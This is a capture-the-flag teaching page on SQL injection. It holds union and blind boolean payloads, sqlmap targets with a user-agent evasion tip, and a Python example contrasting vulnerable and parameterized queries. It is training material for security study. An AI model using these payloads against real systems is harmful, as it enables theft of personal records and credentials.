Purple Team 3: SQLI Challenges
1. Essential SQL Commands
First, click here to reset the server.
Try these commands to see how SQL works.
- SHOW DATABASES
- SHOW TABLES
- SELECT 1
- SELECT "peanut"
- SELECT concat("peanut", "butter")
- SELECT substr("peanut", 2, 2)
- SELECT substr("peanut", 2, 1) = 'e'
- SELECT substr("peanut", 2, 1) = 'a'
- SELECT * FROM employees
- SELECT id FROM employees
- SELECT id, 2 FROM employees
- SELECT name, id FROM employees WHERE id=1
- SELECT concat(name, id) FROM employees WHERE id=1 OR 'cat'='dog' OR 2=2
- INSERT INTO employees ( id, name, ssn ) VALUES ( 4, 'Kevin', '999-99-9999');
- SELECT * from information_schema.tables
- SELECT TABLE_NAME from information_schema.tables
- SELECT * from information_schema.columns
- SELECT COLUMN_NAME from information_schema.columns
1.1: SSN (5 pts)
The flag is Steve Jobs' SSN.
1.2: YOUNG_MAKE (10 pts)
Find the data shown below.
The flag is covered by a green box.
2. Simple SQLi
First, click here to reset the server.
Search for these names:
- Bill Gates
- Tip O'Neil
- Sam
- Sam' or 1=1 #
- Sam' or 'a'='a
- Sam' UNION SELECT 1 #
2.1: SSN (15 pts)
The flag is Linus' SSN.
2.2: Password (20 pts)
The flag is Steve Jobs' password.
2.3: Sqlmap (10 pts)
Use Sqlmap on this target:
http://ad.samsclass.info/sqli/chal2.php?u=x
The flag is the username, covered by a green box in the image below.
Hint: if you get "forbidden" errors, try randomizing the user-agent.
2.4: Sqlmap (20 pts)
First, click here to reset the server.
Use Sqlmap on this target:
https://games.samsclass.info/sqli/chal2a.php?u=Steve%20Jobs
The flag is in the output, covered by a green box in the image below.
Warning: I used version {1.3#stable} -- a later version may not show the flag value.
2.5: Sqlmap (20 pts)
Use Sqlmap on this target:
https://games.samsclass.info/sqli/chal2a.php?u=Steve%20Jobs
The flag is Steve Jobs' SSN.
2.6: Sqlmap (20 pts)
Use Sqlmap on this target:
https://games.samsclass.info/sqli/chal2a.php?u=Steve%20Jobs
The flag is the number indicating the highest-privilege user.
3. Blind SQLi
First, click here to reset the server.
Try these values:
- Bill Gates
- x
- x' or 'a'='a
- x' or 'b'='a
- x' or 'a'='a'#
- x' or LENGTH(database())=1 #
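Why the probe strings in sections 2 and 3 behave as they do, shown from the defender's side as an added illustration (this is not code from the page or from the challenge server; the employees rows are constructed): the same name search written once by string concatenation and once with a bound parameter. The concatenated version errors on Tip O'Neil, returns every row for x' or 'a'='a and no rows for x' or 'b'='a, which is the true/false signal blind SQLi relies on; the parameterized version returns nothing but an exact-name match for any of them.

```python
import sqlite3

# Constructed sample data standing in for the challenge server's employees
# table (column names follow the INSERT statement on the page; values are made up).
SAMPLE_ROWS = [
    (1, "Bill Gates", "000-00-0001"),
    (2, "Steve Jobs", "000-00-0002"),
    (3, "Tip O'Neil", "000-00-0003"),
]


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE employees (id INTEGER, name TEXT, ssn TEXT)")
    conn.executemany("INSERT INTO employees (id, name, ssn) VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn, user_input):
    # The bug: user input is spliced into the SQL text, so a quote closes the
    # string literal and the rest of the input is parsed as SQL.
    sql = "SELECT name, ssn FROM employees WHERE name = '" + user_input + "'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, user_input):
    # The fix: the driver sends the value separately from the statement text,
    # so a quote in the input can only ever be part of the search string.
    sql = "SELECT name, ssn FROM employees WHERE name = ?"
    return conn.execute(sql, (user_input,)).fetchall()


def row_counts(user_input):
    """Return (vulnerable_count, parameterized_count) for one search term.
    A syntax error in the vulnerable path is reported as -1."""
    conn = build_db()
    try:
        try:
            vuln = len(search_vulnerable(conn, user_input))
        except sqlite3.Error:
            vuln = -1  # the apostrophe in a legitimate name breaks the query
        return vuln, len(search_parameterized(conn, user_input))
    finally:
        conn.close()


if __name__ == "__main__":
    for term in ["Bill Gates", "Tip O'Neil", "x' or 'a'='a", "x' or 'b'='a"]:
        print(repr(term), row_counts(term))
```

SQLite is used here because it ships with Python; the `#` comment in the page's MySQL payloads is not SQLite syntax, so the probes shown are the ones that work on both.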
3.1: Database Name Length (5 pts)
The flag is the length of the database's name.
3.2: SSN (10 pts)
Try these values:
- x' UNION select 1#
- x' UNION SELECT name FROM employees WHERE name='Bill Gates' AND substr(name, 1, 1)='B'#
- x' UNION SELECT name FROM employees WHERE name='Bill Gates' AND substr(name, 1, 1)='A'#
- x' UNION SELECT name FROM employees WHERE name='Bill Gates' AND substr(name, 1, 1)>'A'#
- x' UNION SELECT name FROM employees WHERE name='Bill Gates' AND length(name)>2#
The flag is the first three digits of Bill Gates' SSN.
3.3: ID (5 pts)
The flag is admin's ID.
3.4: Length (5 pts)
The flag is the length of Bill Gates' password.
3.5: Bill's Password (20 pts)
The flag is Bill Gates' password.
3.6: Password (30 pts)
The flag is admin's password.
Updated 5-20-19
Hint about user-agent added 5-21-19